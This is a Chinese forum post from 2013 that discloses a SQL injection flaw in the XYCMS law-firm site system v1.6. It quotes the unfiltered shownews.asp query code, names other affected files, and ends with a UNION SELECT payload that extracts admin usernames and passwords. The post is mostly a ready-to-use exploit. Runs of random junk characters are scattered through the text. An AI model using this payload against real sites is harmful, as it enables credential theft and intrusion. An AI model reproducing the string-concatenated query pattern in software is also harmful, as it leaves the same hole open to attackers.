前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似* ]* P: r. Q0 ]$ P8 N9 a5 ^
8 I* U/ Y( N& F3 M淫荡分割线
q( \6 q- B: k: f K* r1 a--------------------------------------------------------7 n# H4 f6 X& R' @* R! ]) k
! S ^9 B0 T8 R, P1 b8 {* v
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
1 B: T9 l6 X8 U( z- { u源码地址:http://down.chinaz.com/soft/29233.htm9 o! u. U5 [' w( a) s. L
% p8 E+ G7 f% B$ a
漏洞文件:shownews.asp
/ {' I" Q* R* C; M漏洞代码:7-13行; Z7 g. k% U% k, q7 Y" g8 ]
+ U+ ~) @- \* t- w8 W1 G- f
- E1 H. |0 r7 e0 ~+ ~1 X
<% 3 d* d5 v" w8 b. \
id=request.QueryString("id")! G% @; w* [5 r
' s2 x. i' b! @/ d4 j9 Eset snews=server.createobject("adodb.recordset")
/ A" a6 @8 ~4 J5 Qexec="select * from [news] where id="&id
( a: e" r5 T8 J0 f7 Z! ^% t9 N; Lsnews.open exec,conn,1,1
0 C1 ?8 l1 C3 v) }) a5 n. @%>2 q5 a( ^# }0 f0 c
) o5 i4 |7 d# v8 \+ Y' @0 G; h
. w& H0 ~, R/ y/ Q8 q什么过滤都没有 直造成注入0 [) F9 ^' K' b
m( h2 O8 N9 @注入点:http://127.0.0.1:99/shownews.asp?id=xx
% l, C6 L5 L6 U2 e' H) z7 R
8 W1 b* y0 o& u/ e其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
: h! ]; A; [5 R& a # s) s2 V3 q$ C. U9 ^& N3 a# u
5 `: D$ [' M( A+ f/ ^( Iexp: union select 1,admin,password,4,5,7 from admin_user
2 M% q8 }3 R4 T9 }* t) R9 L4 k* V; {0 U
|
发表于 2013-4-4 17:28:12
收藏
分享
支持
反对